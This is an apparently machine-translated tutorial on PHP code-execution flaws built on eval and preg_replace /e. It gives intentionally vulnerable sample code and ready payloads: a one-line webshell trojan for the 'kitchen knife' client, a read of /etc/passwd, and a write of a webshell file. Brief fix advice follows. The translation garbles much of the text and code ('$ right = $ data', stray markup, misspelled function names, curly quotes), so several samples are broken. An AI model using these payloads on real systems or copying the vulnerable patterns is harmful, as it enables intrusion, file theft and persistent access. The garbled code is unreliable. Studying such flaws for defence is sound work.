Code execution vulnerability causes:
When an application call some code that can convert a string to a function (such as eval PHP in), it did not consider whether the user control string will cause code execution vulnerability.
Difficult to find vulnerabilities by black boxes, most of which are based on the source code execution vulnerability judge.
Code execution related functions:
PHP: eval, assert, preg_replace (), + / e mode (PHP version <5.5.0)
Javascript: eval
Vbscript:Execute、Eval
Python: exec
Java: Java eval function in php No such direct function can be converted into a string of code execution, but a reflection mechanism, and various mechanisms based on the reflected expression engine, such as: OGNL, SpEL, MVEL, these can cause code execution vulnerability.
Code execution vulnerability in the case:
1. controllable point of the program to be executed.
<?php
$data = $_GET[‘data’];
eval ( "\ $ right = $ data;");
echo $ret;
?>
Use: directly into the PHP code we want to execute.
2. The parameters of the function of a controllable point value and wrapped single quotes.
<?php
$data = $_GET[‘data’];
eval (“\$ret = strtolower(‘$data’);”);
echo $ret;
?>
Use: You must close single quote.
Pl: '); desired function; //
[if! supportLists] 3. [ endif] parameters of a function and a controllable point value is wrapped in double quotes.
<?php
$data = $_GET[‘data’];
eval (“\$ret = strtolower(“\’’$_data\”);”);
echo $ret;
?>
Pl: {$ {}} desired function
"); The desired function; //
In PHP, if double quotes which contains a variable, PHP interpreter will replace the variable interpretation result; apostrophes variable is not processed.
4. preg_replace () + / E (the PHP version <5.5.0)
<?php
$data = $_GET[‘data’];
preg_repalce(‘/<data>(.*)<\ /data>/e’, ’$ret=”\\1”;’ $data);
echo $ret;
?>
{{$ Required function}} </ data>
Code execution vulnerability using:
Trojan sentence
${@eval($_POST[1])}
Get the current working directory
${exit(print(getcwd()))}
Use kitchen knife
Reading file
${exit(var_dump(file_get_contents($_POST[f])))}
f=/etc/passwd
With the post submitted value f = / etc / passwd
Write webshell
${exit(var_dump(file_put_contents($_POST[f], $_POST[d])))}
f=1.php&d=1111111
Also use post
Program code execution bug fixes:
For the eval () function must ensure that the user can not easily access the parameter or use a regular eval strict judgment data input format.
For strings must use single quotes wrapped controllable codes, and are inserted before addslashes
For preg_replace abandon the use of modifier e. If you must use the e modifier, ensure that the second parameter, for matching the subject is out, wrapped in single quotes.
Reproduced in: https: //www.jianshu.com/p/2e7363f3d3ea